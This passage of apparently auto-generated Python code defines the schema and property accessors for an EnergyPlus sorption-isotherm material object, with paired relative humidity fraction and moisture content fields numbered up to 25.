'unit': u'kg/m3'}),
(u'relative humidity fraction 4',
{'name': u'Relative Humidity Fraction 4',
'pyname': u'relative_humidity_fraction_4',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 4',
{'name': u'Moisture Content 4',
'pyname': u'moisture_content_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 5',
{'name': u'Relative Humidity Fraction 5',
'pyname': u'relative_humidity_fraction_5',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 5',
{'name': u'Moisture Content 5',
'pyname': u'moisture_content_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 6',
{'name': u'Relative Humidity Fraction 6',
'pyname': u'relative_humidity_fraction_6',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 6',
{'name': u'Moisture Content 6',
'pyname': u'moisture_content_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 7',
{'name': u'Relative Humidity Fraction 7',
'pyname': u'relative_humidity_fraction_7',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 7',
{'name': u'Moisture Content 7',
'pyname': u'moisture_content_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 8',
{'name': u'Relative Humidity Fraction 8',
'pyname': u'relative_humidity_fraction_8',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 8',
{'name': u'Moisture Content 8',
'pyname': u'moisture_content_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 9',
{'name': u'Relative Humidity Fraction 9',
'pyname': u'relative_humidity_fraction_9',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 9',
{'name': u'Moisture Content 9',
'pyname': u'moisture_content_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 10',
{'name': u'Relative Humidity Fraction 10',
'pyname': u'relative_humidity_fraction_10',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 10',
{'name': u'Moisture Content 10',
'pyname': u'moisture_content_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 11',
{'name': u'Relative Humidity Fraction 11',
'pyname': u'relative_humidity_fraction_11',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 11',
{'name': u'Moisture Content 11',
'pyname': u'moisture_content_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 12',
{'name': u'Relative Humidity Fraction 12',
'pyname': u'relative_humidity_fraction_12',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 12',
{'name': u'Moisture Content 12',
'pyname': u'moisture_content_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 13',
{'name': u'Relative Humidity Fraction 13',
'pyname': u'relative_humidity_fraction_13',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 13',
{'name': u'Moisture Content 13',
'pyname': u'moisture_content_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 14',
{'name': u'Relative Humidity Fraction 14',
'pyname': u'relative_humidity_fraction_14',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 14',
{'name': u'Moisture Content 14',
'pyname': u'moisture_content_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 15',
{'name': u'Relative Humidity Fraction 15',
'pyname': u'relative_humidity_fraction_15',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 15',
{'name': u'Moisture Content 15',
'pyname': u'moisture_content_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 16',
{'name': u'Relative Humidity Fraction 16',
'pyname': u'relative_humidity_fraction_16',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 16',
{'name': u'Moisture Content 16',
'pyname': u'moisture_content_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 17',
{'name': u'Relative Humidity Fraction 17',
'pyname': u'relative_humidity_fraction_17',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 17',
{'name': u'Moisture Content 17',
'pyname': u'moisture_content_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 18',
{'name': u'Relative Humidity Fraction 18',
'pyname': u'relative_humidity_fraction_18',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 18',
{'name': u'Moisture Content 18',
'pyname': u'moisture_content_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 19',
{'name': u'Relative Humidity Fraction 19',
'pyname': u'relative_humidity_fraction_19',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 19',
{'name': u'Moisture Content 19',
'pyname': u'moisture_content_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 20',
{'name': u'Relative Humidity Fraction 20',
'pyname': u'relative_humidity_fraction_20',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 20',
{'name': u'Moisture Content 20',
'pyname': u'moisture_content_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 21',
{'name': u'Relative Humidity Fraction 21',
'pyname': u'relative_humidity_fraction_21',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 21',
{'name': u'Moisture Content 21',
'pyname': u'moisture_content_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 22',
{'name': u'Relative Humidity Fraction 22',
'pyname': u'relative_humidity_fraction_22',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 22',
{'name': u'Moisture Content 22',
'pyname': u'moisture_content_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 23',
{'name': u'Relative Humidity Fraction 23',
'pyname': u'relative_humidity_fraction_23',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 23',
{'name': u'Moisture Content 23',
'pyname': u'moisture_content_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 24',
{'name': u'Relative Humidity Fraction 24',
'pyname': u'relative_humidity_fraction_24',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 24',
{'name': u'Moisture Content 24',
'pyname': u'moisture_content_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 25',
{'name': u'Relative Humidity Fraction 25',
'pyname': u'relative_humidity_fraction_25',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 25',
{'name': u'Moisture Content 25',
'pyname': u'moisture_content_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:SorptionIsotherm',
'pyname': u'MaterialPropertyHeatAndMoistureTransferSorptionIsotherm',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
"""field `Material Name`
| The Material Name that the moisture sorption isotherm will be added to.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def number_of_isotherm_coordinates(self):
"""field `Number of Isotherm Coordinates`
| Number of data Coordinates
| value >= 1
| value <= 25
Args:
value (int): value for IDD Field `Number of Isotherm Coordinates`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_isotherm_coordinates` or None if not set
"""
return self["Number of Isotherm Coordinates"]
@number_of_isotherm_coordinates.setter
def number_of_isotherm_coordinates(self, value=None):
"""Corresponds to IDD field `Number of Isotherm Coordinates`"""
self["Number of Isotherm Coordinates"] = value
@property
def relative_humidity_fraction_1(self):
"""field `Relative Humidity Fraction 1`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_1` or None if not set
"""
return self["Relative Humidity Fraction 1"]
@relative_humidity_fraction_1.setter
def relative_humidity_fraction_1(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 1`"""
self["Relative Humidity Fraction 1"] = value
@property
def moisture_content_1(self):
"""field `Moisture Content 1`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_1` or None if not set
"""
return self["Moisture Content 1"]
@moisture_content_1.setter
def moisture_content_1(self, value=None):
"""Corresponds to IDD field `Moisture Content 1`"""
self["Moisture Content 1"] = value
@property
def relative_humidity_fraction_2(self):
"""field `Relative Humidity Fraction 2`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_2` or None if not set
"""
return self["Relative Humidity Fraction 2"]
@relative_humidity_fraction_2.setter
def relative_humidity_fraction_2(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 2`"""
self["Relative Humidity Fraction 2"] = value
@property
def moisture_content_2(self):
"""field `Moisture Content 2`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_2` or None if not set
"""
return self["Moisture Content 2"]
@moisture_content_2.setter
def moisture_content_2(self, value=None):
"""Corresponds to IDD field `Moisture Content 2`"""
self["Moisture Content 2"] = value
@property
def relative_humidity_fraction_3(self):
"""field `Relative Humidity Fraction 3`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_3` or None if not set
"""
return self["Relative Humidity Fraction 3"]
@relative_humidity_fraction_3.setter
def relative_humidity_fraction_3(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 3`"""
self["Relative Humidity Fraction 3"] = value
@property
def moisture_content_3(self):
"""field `Moisture Content 3`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_3` or None if not set
"""
return self["Moisture Content 3"]
@moisture_content_3.setter
def moisture_content_3(self, value=None):
"""Corresponds to IDD field `Moisture Content 3`"""
self["Moisture Content 3"] = value
@property
def relative_humidity_fraction_4(self):
"""field `Relative Humidity Fraction 4`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_4` or None if not set
"""
return self["Relative Humidity Fraction 4"]
@relative_humidity_fraction_4.setter
def relative_humidity_fraction_4(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 4`"""
self["Relative Humidity Fraction 4"] = value
@property
def moisture_content_4(self):
"""field `Moisture Content 4`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_4` or None if not set
"""
return self["Moisture Content 4"]
@moisture_content_4.setter
def moisture_content_4(self, value=None):
"""Corresponds to IDD field `Moisture Content 4`"""
self["Moisture Content 4"] = value
@property
def relative_humidity_fraction_5(self):
"""field `Relative Humidity Fraction 5`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_5` or None if not set
"""
return self["Relative Humidity Fraction 5"]
@relative_humidity_fraction_5.setter
def relative_humidity_fraction_5(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 5`"""
self["Relative Humidity Fraction 5"] = value
@property
def moisture_content_5(self):
"""field `Moisture Content 5`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_5` or None if not set
"""
return self["Moisture Content 5"]
@moisture_content_5.setter
def moisture_content_5(self, value=None):
"""Corresponds to IDD field `Moisture Content 5`"""
self["Moisture Content 5"] = value
@property
def relative_humidity_fraction_6(self):
"""field `Relative Humidity Fraction 6`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_6` or None if not set
"""
return self["Relative Humidity Fraction 6"]
@relative_humidity_fraction_6.setter
def relative_humidity_fraction_6(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 6`"""
self["Relative Humidity Fraction 6"] = value
@property
def moisture_content_6(self):
"""field `Moisture Content 6`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_6` or None if not set
"""
return self["Moisture Content 6"]
@moisture_content_6.setter
def moisture_content_6(self, value=None):
"""Corresponds to IDD field `Moisture Content 6`"""
self["Moisture Content 6"] = value
@property
def relative_humidity_fraction_7(self):
"""field `Relative Humidity Fraction 7`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_7` or None if not set
"""
return self["Relative Humidity Fraction 7"]
@relative_humidity_fraction_7.setter
def relative_humidity_fraction_7(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 7`"""
self["Relative Humidity Fraction 7"] = value
@property
def moisture_content_7(self):
"""field `Moisture Content 7`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_7` or None if not set
"""
return self["Moisture Content 7"]
@moisture_content_7.setter
def moisture_content_7(self, value=None):
"""Corresponds to IDD field `Moisture Content 7`"""
self["Moisture Content 7"] = value
@property
def relative_humidity_fraction_8(self):
"""field `Relative Humidity Fraction 8`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_8` or None if not set
"""
return self["Relative Humidity Fraction 8"]
@relative_humidity_fraction_8.setter
def relative_humidity_fraction_8(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 8`"""
self["Relative Humidity Fraction 8"] = value
@property
def moisture_content_8(self):
"""field `Moisture Content 8`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_8` or None if not set
"""
return self["Moisture Content 8"]
@moisture_content_8.setter
def moisture_content_8(self, value=None):
"""Corresponds to IDD field `Moisture Content 8`"""
self["Moisture Content 8"] = value
@property
def relative_humidity_fraction_9(self):
"""field `Relative Humidity Fraction 9`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_9` or None if not set
"""
return self["Relative Humidity Fraction 9"]
@relative_humidity_fraction_9.setter
def relative_humidity_fraction_9(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 9`"""
self["Relative Humidity Fraction 9"] = value
@property
def moisture_content_9(self):
"""field `Moisture Content 9`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_9` or None if not set
"""
return self["Moisture Content 9"]
@moisture_content_9.setter
def moisture_content_9(self, value=None):
"""Corresponds to IDD field `Moisture Content 9`"""
self["Moisture Content 9"] = value
@property
def relative_humidity_fraction_10(self):
"""field `Relative Humidity Fraction 10`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_10` or None if not set
"""
return self["Relative Humidity Fraction 10"]
@relative_humidity_fraction_10.setter
def relative_humidity_fraction_10(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 10`"""
self["Relative Humidity Fraction 10"] = value
@property
def moisture_content_10(self):
"""field `Moisture Content 10`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_10` or None if not set
"""
return self["Moisture Content 10"]
@moisture_content_10.setter
def moisture_content_10(self, value=None):
"""Corresponds to IDD field `Moisture Content 10`"""
self["Moisture Content 10"] = value
@property
def relative_humidity_fraction_11(self):
"""field `Relative Humidity Fraction 11`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_11` or None if not set
"""
return self["Relative Humidity Fraction 11"]
@relative_humidity_fraction_11.setter
def relative_humidity_fraction_11(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 11`"""
self["Relative Humidity Fraction 11"] = value
@property
def moisture_content_11(self):
"""field `Moisture Content 11`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_11` or None if not set
"""
return self["Moisture Content 11"]
@moisture_content_11.setter
def moisture_content_11(self, value=None):
"""Corresponds to IDD field `Moisture Content 11`"""
self["Moisture Content 11"] = value
@property
def relative_humidity_fraction_12(self):
"""field `Relative Humidity Fraction 12`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_12` or None if not set
"""
return self["Relative Humidity Fraction 12"]
@relative_humidity_fraction_12.setter
def relative_humidity_fraction_12(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 12`"""
self["Relative Humidity Fraction 12"] = value
@property
def moisture_content_12(self):
"""field `Moisture Content 12`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_12` or None if not set
"""
return self["Moisture Content 12"]
@moisture_content_12.setter
def moisture_content_12(self, value=None):
"""Corresponds to IDD field `Moisture Content 12`"""
self["Moisture Content 12"] = value
@property
def relative_humidity_fraction_13(self):
"""field `Relative Humidity Fraction 13`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_13` or None if not set
"""
return self["Relative Humidity Fraction 13"]
@relative_humidity_fraction_13.setter
def relative_humidity_fraction_13(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 13`"""
self["Relative Humidity Fraction 13"] = value
@property
def moisture_content_13(self):
"""field `Moisture Content 13`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_13` or None if not set
"""
return self["Moisture Content 13"]
@moisture_content_13.setter
def moisture_content_13(self, value=None):
"""Corresponds to IDD field `Moisture Content 13`"""
self["Moisture Content 13"] = value
@property
def relative_humidity_fraction_14(self):
"""field `Relative Humidity Fraction 14`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_14` or None if not set
"""
return self["Relative Humidity Fraction 14"]
@relative_humidity_fraction_14.setter
def relative_humidity_fraction_14(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 14`"""
self["Relative Humidity Fraction 14"] = value
@property
def moisture_content_14(self):
"""field `Moisture Content 14`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_14` or None if not set
"""
return self["Moisture Content 14"]
@moisture_content_14.setter
def moisture_content_14(self, value=None):
"""Corresponds to IDD field `Moisture Content 14`"""
self["Moisture Content 14"] = value
@property
def relative_humidity_fraction_15(self):
"""field `Relative Humidity Fraction 15`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_15` or None if not set
"""
return self["Relative Humidity Fraction 15"]
@relative_humidity_fraction_15.setter
def relative_humidity_fraction_15(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 15`"""
self["Relative Humidity Fraction 15"] = value
@property
def moisture_content_15(self):
"""field `Moisture Content 15`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_15` or None if not set
"""
return self["Moisture Content 15"]
@moisture_content_15.setter
def moisture_content_15(self, value=None):
"""Corresponds to IDD field `Moisture Content 15`"""
self["Moisture Content 15"] = value
@property
def relative_humidity_fraction_16(self):
"""field `Relative Humidity Fraction 16`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_16` or None if not set
"""
return self["Relative Humidity Fraction 16"]
@relative_humidity_fraction_16.setter
def relative_humidity_fraction_16(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 16`"""
self["Relative Humidity Fraction 16"] = value
@property
def moisture_content_16(self):
"""field `Moisture Content 16`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_16` or None if not set
"""
return self["Moisture Content 16"]
@moisture_content_16.setter
def moisture_content_16(self, value=None):
"""Corresponds to IDD field `Moisture Content 16`"""
self["Moisture Content 16"] = value
@property
def relative_humidity_fraction_17(self):
"""field `Relative Humidity Fraction 17`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_17` or None if not set
"""
return self["Relative Humidity Fraction 17"]
@relative_humidity_fraction_17.setter
def relative_humidity_fraction_17(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 17`"""
self["Relative Humidity Fraction 17"] = value
@property
def moisture_content_17(self):
"""field `Moisture Content 17`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_17` or None if not set
"""
return self["Moisture Content 17"]
@moisture_content_17.setter
def moisture_content_17(self, value=None):
"""Corresponds to IDD field `Moisture Content 17`"""
self["Moisture Content 17"] = value
@property
def relative_humidity_fraction_18(self):
"""field `Relative Humidity Fraction 18`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_18` or None if not set
"""
return self["Relative Humidity Fraction 18"]
@relative_humidity_fraction_18.setter
def relative_humidity_fraction_18(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 18`"""
self["Relative Humidity Fraction 18"] = value
@property
def moisture_content_18(self):
"""field `Moisture Content 18`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_18` or None if not set
"""
return self["Moisture Content 18"]
@moisture_content_18.setter
def moisture_content_18(self, value=None):
"""Corresponds to IDD field `Moisture Content 18`"""
self["Moisture Content 18"] = value
@property
def relative_humidity_fraction_19(self):
"""field `Relative Humidity Fraction 19`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_19` or None if not set
"""
return self["Relative Humidity Fraction 19"]
@relative_humidity_fraction_19.setter
def relative_humidity_fraction_19(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 19`"""
self["Relative Humidity Fraction 19"] = value
@property
def moisture_content_19(self):
"""field `Moisture Content 19`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_19` or None if not set
"""
return self["Moisture Content 19"]
@moisture_content_19.setter
def moisture_content_19(self, value=None):
"""Corresponds to IDD field `Moisture Content 19`"""
self["Moisture Content 19"] = value
@property
def relative_humidity_fraction_20(self):
"""field `Relative Humidity Fraction 20`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_20` or None if not set
"""
return self["Relative Humidity Fraction 20"]
@relative_humidity_fraction_20.setter
def relative_humidity_fraction_20(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 20`"""
self["Relative Humidity Fraction 20"] = value
@property
def moisture_content_20(self):
"""field `Moisture Content 20`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_20` or None if not set
"""
return self["Moisture Content 20"]
@moisture_content_20.setter
def moisture_content_20(self, value=None):
"""Corresponds to IDD field `Moisture Content 20`"""
